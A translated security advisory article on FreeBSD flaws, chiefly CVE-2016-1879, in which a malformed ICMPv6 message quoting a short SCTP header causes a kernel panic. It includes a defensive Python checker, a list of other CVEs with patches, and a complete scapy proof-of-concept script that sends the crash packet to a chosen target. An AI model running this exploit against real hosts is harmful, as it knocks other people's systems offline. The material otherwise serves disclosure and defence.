
Critically dangerous vulnerabilities discovered in FreeBSD



The FreeBSD project team reports that a number of critically dangerous vulnerabilities have been discovered in the operating system, allowing attackers to launch denial-of-service attacks, elevate privileges, and disclose sensitive data.

Incorrect handling of ICMPv6 messages in the SCTP stack (CVE-2016-1879)


SCTP (Stream Control Transmission Protocol) is a transport layer protocol designed to carry telephone network signaling messages over IP. In practice it is mostly used in the technological networks of telecom operators.

FreeBSD versions 9.3, 10.1, and 10.2 are affected by this vulnerability if they are built with SCTP and IPv6 support (the default configuration). To trigger the bug, an attacker needs to send a specially crafted ICMPv6 message. Successful exploitation results in a denial of service (DoS).
DoS occurs due to insufficient verification of the length of the SCTP packet header received in the ICMPv6 error message. When the destination is unavailable, the router can generate an error message and forward it to the sender via ICMPv6.

The original IPv6 packet is enclosed in such an ICMPv6 packet, in which the Next Header field indicates how the upper layer protocol is encapsulated. In this case, it is SCTP.




When the kernel receives an error message via ICMPv6, it locates the quoted upper-layer protocol packet inside it and passes it to the appropriate handler (in this case, sctp6_ctlinput()). The SCTP handler assumes that the quoted packet contains a header of sufficient length and tries to copy it using m_copydata(), which is passed the offset and the number of bytes to read. Since a 12-byte block is expected, sending a packet whose SCTP header is shorter than 12 bytes leads to a null pointer dereference, which crashes the kernel (kernel panic).
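To make the length problem concrete, here is a small added example (not code from the original article, the FreeBSD kernel, or the vendor patch) that walks an ICMPv6 error message in the order the text describes: ICMPv6 header, quoted IPv6 header, Next Header field, then the SCTP common header. It performs the kind of length check the unpatched handler lacked before calling m_copydata(): if fewer than 12 bytes of SCTP header are quoted, the message is flagged as truncated instead of being read. The byte layouts follow RFC 4443 (ICMPv6), RFC 2460 (IPv6) and RFC 4960 (SCTP); the sample messages, port numbers and addresses are constructed for the example, and the ICMPv6 checksum is not verified here.

```python
import struct

ICMPV6_DEST_UNREACH = 1              # ICMPv6 type 1: Destination Unreachable
ICMPV6_ERROR_TYPES = {1, 2, 3, 4}    # Dest Unreach, Packet Too Big, Time Exceeded, Parameter Problem
IPPROTO_SCTP = 132                   # IPv6 Next Header value for SCTP
IPV6_HDR_LEN = 40
SCTP_COMMON_HDR_LEN = 12             # src port(2) + dst port(2) + verification tag(4) + checksum(4)


def inspect_icmpv6_error(icmp: bytes) -> dict:
    """Classify an ICMPv6 message by how much of the quoted SCTP header it carries.

    The order of checks mirrors the kernel's path: ICMPv6 type first, then the
    quoted IPv6 header and its Next Header, and only then the SCTP header length.
    The last check is the one that must happen before any 12-byte copy.
    """
    if len(icmp) < 8:
        return {"verdict": "malformed", "reason": "ICMPv6 header shorter than 8 bytes"}
    icmp_type = icmp[0]
    if icmp_type not in ICMPV6_ERROR_TYPES:
        return {"verdict": "not-error", "icmp_type": icmp_type}
    quoted = icmp[8:]                          # the original packet follows the 8-byte ICMPv6 header
    if len(quoted) < IPV6_HDR_LEN:
        return {"verdict": "malformed", "reason": "quoted IPv6 header truncated"}
    next_header = quoted[6]                    # byte 6 of the IPv6 header is Next Header
    if next_header != IPPROTO_SCTP:
        return {"verdict": "not-sctp", "next_header": next_header}
    sctp = quoted[IPV6_HDR_LEN:]
    if len(sctp) < SCTP_COMMON_HDR_LEN:
        # This is the case the unpatched handler did not check before reading 12 bytes.
        return {"verdict": "truncated-sctp", "sctp_bytes": len(sctp)}
    src_port, dst_port, vtag = struct.unpack("!HHI", sctp[:8])
    return {"verdict": "ok", "src_port": src_port, "dst_port": dst_port, "vtag": vtag}


def build_icmpv6_dest_unreach(inner_transport: bytes) -> bytes:
    """Construct a Destination Unreachable message quoting a minimal IPv6 packet.

    Used only to build test inputs for inspect_icmpv6_error(); addresses are all-zero
    and the ICMPv6 checksum is left at zero (constructed data, not a captured packet).
    """
    icmp_hdr = struct.pack("!BBHI", ICMPV6_DEST_UNREACH, 0, 0, 0)  # type, code, checksum, unused
    ipv6_hdr = struct.pack(
        "!IHBB16s16s",
        0x60000000,            # version 6, traffic class 0, flow label 0
        len(inner_transport),  # payload length
        IPPROTO_SCTP,          # next header: SCTP
        64,                    # hop limit
        bytes(16), bytes(16),  # src / dst addresses (constructed)
    )
    return icmp_hdr + ipv6_hdr + inner_transport


# Constructed sample messages: one with a complete SCTP common header, one with only 4 bytes.
SAMPLE_MESSAGES = {
    "complete": build_icmpv6_dest_unreach(struct.pack("!HHII", 3868, 3868, 0xDEADBEEF, 0)),
    "truncated": build_icmpv6_dest_unreach(b"\x0f\x1c\x0f\x1c"),
}


def count_truncated(messages) -> int:
    """Return how many of the given ICMPv6 messages quote a too-short SCTP header."""
    return sum(1 for m in messages if inspect_icmpv6_error(m)["verdict"] == "truncated-sctp")


if __name__ == "__main__":
    for name, msg in SAMPLE_MESSAGES.items():
        print(name, inspect_icmpv6_error(msg))
```

Run as a script it prints a verdict for each constructed message; on a live system the same check could be run over ICMPv6 error messages captured at the edge to spot quoted SCTP headers shorter than 12 bytes, which no legitimate router would generate from a real SCTP packet.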

Exploiting the vulnerability does not require an open SCTP socket on the target.
The ICMPv6 packet for the attack can be built with scapy. Habr has many articles devoted to this powerful tool (for example, this and this article).

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
from scapy.all import *


def get_args():
    parser = argparse.ArgumentParser(description='#' * 78, epilog='#' * 78)
    parser.add_argument("-m", "--dst_mac", type=str, help="FreeBSD mac address")
    parser.add_argument("-i", "--dst_ipv6", type=str, help="FreeBSD IPv6 address")
    parser.add_argument("-I", "--iface", type=str, help="Iface")
    options = parser.parse_args()
    if options.dst_mac is None or options.dst_ipv6 is None:
        parser.print_help()
        exit()
    return options


if __name__ == '__main__':
    options = get_args()
    # ICMPv6 Destination Unreachable quoting an IPv6 header with Next Header 132 (SCTP)
    # and no SCTP common header behind it
    sendp(Ether(dst=options.dst_mac) / IPv6(dst=options.dst_ipv6) / ICMPv6DestUnreach()
          / IPv6(nh=132, src=options.dst_ipv6, dst='fe80::230:56ff:fea6:648c'),
          iface=options.iface)

Video demonstration of the attack:



To protect yourself from attacks that use this bug, apply the vendor's patch, which adds extra checks to the handling of ICMPv6 messages in the SCTP stack; the kernel then needs to be recompiled.

That's not all


In addition, a number of serious vulnerabilities have been discovered in the system. The FreeBSD developers have released several patches that fix these bugs:

  1. A DoS vulnerability caused by an error in processing TCP connections with the TCP_MD5SIG and TCP_NOOPT socket options enabled. For successful exploitation, an attacker needs to open a listening socket with the TCP_NOOPT option enabled. (CVE-2016-1882, patch );
  2. A vulnerability that allows a local user to elevate privileges or cause a denial of service. It is caused by an access control error that allows arbitrary memory to be overwritten through specially crafted setgroups(2) system calls made via the Linux compatibility layer. (CVE-2016-1881, patch );
  3. Due to an error in the handling of Linux robust futex lists, attackers can disclose the contents of system memory (CVE-2016-1880, patch );
  4. Insecure default permissions that allow access to the bsnmpd daemon's configuration file “/etc/bsnmpd.conf” (CVE-2015-5677, patch ).

To avoid problems associated with the exploitation of these vulnerabilities, experts from Positive Technologies recommend using IPv6 addressing only where applications require it, installing security updates from the OS developers, and using specialized tools (for example, MaxPatrol) to monitor the security of the system.

Source: https://habr.com/ru/post/275637/

